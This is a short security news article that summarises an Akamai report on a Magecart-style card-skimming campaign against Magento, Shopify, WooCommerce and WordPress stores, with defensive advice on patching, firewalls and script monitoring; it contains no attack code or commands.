New e-commerce exploit affects WooCommerce, Shopify, Magento
3 mins read

New e-commerce exploit affects WooCommerce, Shopify, Magento

In a major hack, e-commerce websites were exploited to steal users’ credit card information and extend the attack to other websites.

These hacking attacks are known as Magecart-style skimmers and are spreading across multiple e-commerce platforms worldwide.

Attackers are targeting various e-commerce platforms:

  • Magento
  • Shopify
  • WooCommerce
  • WordPress

What does the attack do?

When infecting a website, attackers have two goals:

1. Use the site to spread to other sites

2. Steal personal information like credit card details from customers of the infected website.

Detecting a vulnerability is difficult because code placed on a website is encrypted and sometimes masked as Google tag or Facebook pixel code.

The image shows fake Google Analytics code with encrypted URL of an exploited URLScreenshot of Akamai

However, the code is aimed at input forms for credit card information.

It also serves as an intermediary to launch attacks on behalf of the attacker, thereby obscuring the true source of the attacks.

Magecart style skimmer

A Magecart attack is an attack that takes place via an existing vulnerability in the e-commerce platform itself.

With WordPress and WooCommerce, it could be a vulnerability in a theme or plugin.

Shopify could be an existing vulnerability in that platform.

In all cases, the attackers exploit vulnerabilities in the platform that the e-commerce websites use.

This is not a single vulnerability that can be easily fixed. There is a wide range of them.

Akamai’s report states:

“Before the campaign can start in earnest, the attackers look for vulnerable websites to act as ‘hosts’ for the malicious code that is later used for the web-skimming attack.

…Although it is unclear how these websites are attacked, based on our recent investigations into similar, previous campaigns, the attackers will typically be looking for vulnerabilities in the digital commerce platform of the attacked websites (such as Magento, WooCommerce, WordPress, Shopify, etc.). ) or in vulnerable third party services used by the Website.”

Recommended action

Akamai encourages all e-commerce users to secure their websites. This means you need to ensure that all third party apps and plugins are up to date and that the platform has the very latest version.

They also recommend using a web application firewall (WAF), which detects and prevents intruders when hackers browse a website looking for a vulnerable site.

Users of platforms like WordPress have several security solutions at their disposal, with Sucuri Security (website hardening) and WordFence (WAF) being popular and trusted ones.

Akamai recommends:

“…the complexity, deployment, agility, and distribution of today’s web application environments—and the various methods attackers can use to install web skimmers—need more dedicated security solutions that provide and provide visibility into the behavior of scripts running in the browser.” Defense against client-side attacks.

A suitable solution must be closer to where the actual attack on the clients takes place. It should be able to successfully identify attempted reads from sensitive input fields and data exfiltration (we used Akamai Page Integrity Manager in our tests).

We recommend that these events are properly recorded to enable fast and effective mitigation.”

See the original report for more details:

New Magecart style campaign that abuses legitimate websites to attack others